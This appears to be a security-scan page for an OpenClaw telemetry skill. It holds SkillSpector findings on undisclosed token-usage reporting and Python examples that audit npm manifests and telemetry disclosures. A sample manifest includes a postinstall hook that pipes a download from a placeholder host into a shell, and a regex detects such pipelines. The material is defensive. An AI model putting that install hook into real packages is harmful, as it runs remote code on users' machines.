OpenClaw Reporter

Security checks across malware telemetry and agentic risk

Overview

This skill is an opt-in OpenClaw telemetry reporter with disclosed network reporting, local credential storage, and an external CLI dependency.

Install only if you are comfortable sending platform, model, chosen claw name, generic task activity, IP-derived approximate location, and optional token counts to the OpenClaw service. Verify that you trust the @ricardweii/claw-market npm package before installing it globally, and use claw-market config clear to stop reporting.
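Checking the trust of an npm package before a global install is left to the reader above. The following is an added example, not code from the OpenClaw Reporter page or the claw-market project: it audits a package manifest for the signals a reviewer wants before installing a CLI globally, namely install-time lifecycle scripts, scripts that fetch remote content, unpinned dependency ranges, and the commands the install would put on PATH. The `package.json` content below is constructed for illustration; in practice the manifest comes from `npm view <pkg> --json` or from unpacking `npm pack <pkg>`.

```python
"""Pre-install audit of an npm package manifest.

Added example, not code from the OpenClaw Reporter page or the claw-market
project. The manifest below is constructed for illustration.
"""
import json
import re

# Lifecycle hooks that npm executes automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Exact semver (1.2.3, optionally with a prerelease/build suffix); anything else
# (^, ~, ranges, tags such as "latest", git/URL specs) resolves at install time.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")

# Download-and-execute pipelines, or any URL at all, inside a script.
REMOTE_CONTENT = re.compile(
    r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b[^|]*\|\s*(?:sh|bash|node|python\d*)\b"
    r"|https?://",
    re.IGNORECASE,
)

# Constructed sample manifest (not a real package).
SAMPLE_MANIFEST = json.loads("""
{
  "name": "example-reporter",
  "version": "1.0.0",
  "bin": {"example-reporter": "bin/cli.js"},
  "scripts": {
    "postinstall": "node scripts/setup.js && curl -s https://example.invalid/init.sh | sh",
    "test": "node test.js"
  },
  "dependencies": {"axios": "^1.6.0", "chalk": "5.3.0"},
  "optionalDependencies": {"fsevents": "~2.3.0"}
}
""")


def is_pinned(spec: str) -> bool:
    """True only for an exact version; ranges, tags and URLs are not pinned."""
    return bool(EXACT_VERSION.match(spec.strip()))


def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable findings for a parsed package.json."""
    findings = []

    # 1. Commands a global install puts on the user's PATH. `bin` may be a
    #    string (command named after the package) or a name -> path map.
    bin_field = manifest.get("bin") or {}
    commands = [manifest.get("name")] if isinstance(bin_field, str) else list(bin_field)
    for command in commands:
        findings.append(f"global install adds command '{command}' to PATH")

    # 2. Code that runs during installation, before the user invokes anything.
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append(f"install-time script '{hook}': {scripts[hook]}")
            if REMOTE_CONTENT.search(scripts[hook]):
                findings.append(f"script '{hook}' fetches or references remote content")

    # 3. Dependencies whose resolved version can change between installs.
    for section in ("dependencies", "optionalDependencies"):
        for name, spec in (manifest.get(section) or {}).items():
            if not is_pinned(spec):
                findings.append(f"unpinned {section} entry '{name}': {spec}")

    return findings


if __name__ == "__main__":
    for line in audit_manifest(SAMPLE_MANIFEST):
        print("-", line)
```

Registry metadata is only the first pass: an exact version without a lockfile and integrity hash still lets a republished tarball slip through, so unpack the tarball and read any install script and anything that touches environment variables or writes credential files. `npm install --ignore-scripts` skips the lifecycle hooks if you want the files on disk before deciding whether to let them run.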

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (2)

Description-Behavior Mismatch

Severity: Medium
Confidence: 89%
Finding
The skill manifest and top-level description scope telemetry to registration, heartbeat, and task reports, but later documentation adds token-usage reporting and leaderboard participation. This expands data collection beyond the declared scope and can undermine informed consent because users may authorize one set of telemetry while the skill enables another.

Intent-Code Divergence

Severity: Medium
Confidence: 84%
Finding
The file states that no project-specific data is ever sent, but later introduces token-usage reporting derived from the user session. Even if raw content is not transmitted, session-derived telemetry is still additional metadata about user activity, making the disclosure incomplete and potentially misleading.
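Both findings above come down to the same check: what the manifest declares the skill sends versus what the documentation later describes, plus whether an absolute "nothing is ever sent" style promise sits next to extra reporting. The following is an added example, not SkillSpector's code and not the skill's own. It compares a manifest's declared telemetry categories against the categories its documentation mentions and flags any undeclared ones. The `telemetry` manifest field, the category vocabulary, the sample manifest and the sample documentation are all constructed for illustration.

```python
"""Disclosure-scope check for a skill's telemetry.

Added example, not SkillSpector's code and not the skill's own. The manifest
field `telemetry`, the category vocabulary and the sample texts are constructed.
"""
import re

# Hypothetical vocabulary: telemetry category -> phrases that indicate it.
CATEGORY_PATTERNS = {
    "registration": [r"\bregist(?:ers?|ration)\b"],
    "heartbeat": [r"\bheartbeats?\b"],
    "task_reports": [r"\btask (?:reports?|activity)\b"],
    "token_usage": [r"\btoken[- ](?:usage|counts?)\b", r"\btokens? (?:used|consumed)\b"],
    "leaderboard": [r"\bleaderboard\b", r"\brankings?\b"],
    "location": [r"\bip[- ]derived\b", r"\bapproximate location\b", r"\bgeolocation\b"],
}

# Sentences promising that data is never sent or collected; a later section can
# quietly contradict these, which is the misleading-disclosure case.
ABSOLUTE_CLAIM = re.compile(
    r"\b(?:never|no|not)\b[^.]*?\b(?:sent|transmitted|shared|collected)\b",
    re.IGNORECASE,
)

# Constructed sample inputs.
SAMPLE_MANIFEST = {
    "name": "example-reporter",
    "telemetry": ["registration", "heartbeat", "task_reports"],
}

SAMPLE_DOCS = """\
Example Reporter registers your claw, sends a heartbeat every minute, and posts
task reports. No project-specific data is ever sent.

Leaderboard

Enable token-usage reporting with `example-reporter config set tokens on` to
appear on the public leaderboard.
"""


def categories_in_text(text: str) -> set[str]:
    """Telemetry categories whose indicator phrases occur in the text."""
    lowered = text.lower()
    return {
        category
        for category, patterns in CATEGORY_PATTERNS.items()
        if any(re.search(p, lowered) for p in patterns)
    }


def absolute_claims(text: str) -> list[str]:
    """Sentences asserting that some data is never sent or collected."""
    sentences = re.split(r"(?<=[.!?])\s+", " ".join(text.split()))
    return [s for s in sentences if ABSOLUTE_CLAIM.search(s)]


def disclosure_report(manifest: dict, docs: str) -> dict:
    """Compare declared telemetry scope with what the documentation describes."""
    declared = set(manifest.get("telemetry") or [])
    described = categories_in_text(docs)
    undeclared = sorted(described - declared)
    claims = absolute_claims(docs)
    return {
        "undeclared": undeclared,  # documented reporting the manifest never declared
        "unused_declarations": sorted(declared - described),
        "absolute_claims": claims,
        "mismatch": bool(undeclared),
        # Extra telemetry beside a "never sent" promise is the misleading case.
        "misleading_claim": bool(undeclared and claims),
    }


if __name__ == "__main__":
    for key, value in disclosure_report(SAMPLE_MANIFEST, SAMPLE_DOCS).items():
        print(f"{key}: {value}")
```

A keyword vocabulary like this catches wording, not behaviour; the complementary check is to grep the skill's code for the same endpoints and payload fields and confirm that every field it sends maps back to a declared category.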

VirusTotal

0/64 vendors flagged this skill; all 64 reported it clean.